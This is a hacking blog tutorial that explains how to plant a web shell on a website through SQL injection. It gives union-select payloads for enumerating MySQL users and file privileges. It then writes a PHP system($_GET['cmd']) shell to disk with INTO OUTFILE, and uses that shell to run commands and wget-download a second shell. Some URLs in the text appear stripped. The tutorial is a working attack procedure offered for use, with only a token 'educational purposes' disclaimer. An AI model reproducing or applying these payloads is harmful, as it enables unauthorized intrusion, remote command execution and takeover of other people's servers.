Latest News

Shell Uploading Via SQL Injection

In this I will show you how to upload a shell via SQLi.

This method is useful when you have admin info and can't upload anything, or when you have admin info but you can't find admin login and so on.

But this method is very rare!

Anyways let's start with our tutorial...

Things we will need:

1)  Your shell source in .txt format (I will use
2)  Basic SQLi skill

So let's say you injected our site like this:,2,3,4--

Now you have admin info, you logged in and you failed uploading a shell.
Now our method comes to point.
Remember what column you should use. (Mine one will be 3)

Type in your vuln. column "user" and at the end "from mysql.user" so URL would be like: newsnomber=-999+union+select+1,2,user,4+from+mysql.user--

NOTE: If you get an error after this you can't use this

You should get what is the current user for the site.


Good. Now remember that you will need it.

Now we check users file privilege.

In your column type: "group_concat(user,0x3a,file_priv)" newsnomber=-999+union+select+1,2,group_concat(user,0x3a,file_priv), er--

Now you should get all users and their privileges


Now our user was "moto25_moto25"...
That means we can make files on server.
Let's go to the next step.

To create a file into a server you need to find sites full path.

To do that you must cause an error, hopefully that error would give us our sites path.

We got ours:


After that we must find writeable folder in our server.
Just browse around or scan it with Acunetix.
Usually public_html folder is writeable.
For our example I used

So spawning our shell is easy as 1,2,3..
Let's get back at our injection.,2,3,4--

Our column should be our php line.
In there we type:

" system($_GET['cmd']); ?>"

NOTE: Quotation marks are required

All other columns should be "null",null," system($_GET['cmd']); ?>",null--

And at the end we use "INTO OUTFILE" function.,null," system($_GET['cmd']); ?>",null INTO OUTFILE--

Now we use site's full path and writeable folder:


Now,null," system($_GET['cmd']); ?>",null INTO OUTFILE /var/www/vhost/moto25/data/www/

And our file name and extension.,null," system($_GET['cmd']); ?>",null INTO OUTFILE "/var/www/vhost/moto25/data/www/"--

Now, our shell should be spawned.
We now check if our file is created.

You should get something like:

Warning: system() [function.system]: Cannot execute a blank command in /sites/full/path/phpcmd.php on line 1

That means we have our file created! Yeh…….!
We check if it is working: -la

We can see all files in current directory!
And simple command to download a shell: -O egy.php


wget - Downloads textual file on our server (egy.txt). -O - Renames it to egy.php

Game over!
I hope you learned something more interesting ..


No comments:

Post a Comment

Contact Us

24x7 online , we happy to answer you , ,
skype: greeenchip


This Blog and its TUT's are intended for educational purposes only, no-one involved in the creation of this TuT may be held responsible for any illegal acts brought about by this Blog or TuT.

Featured Post

Custom Domains And HTTPS Redirection Code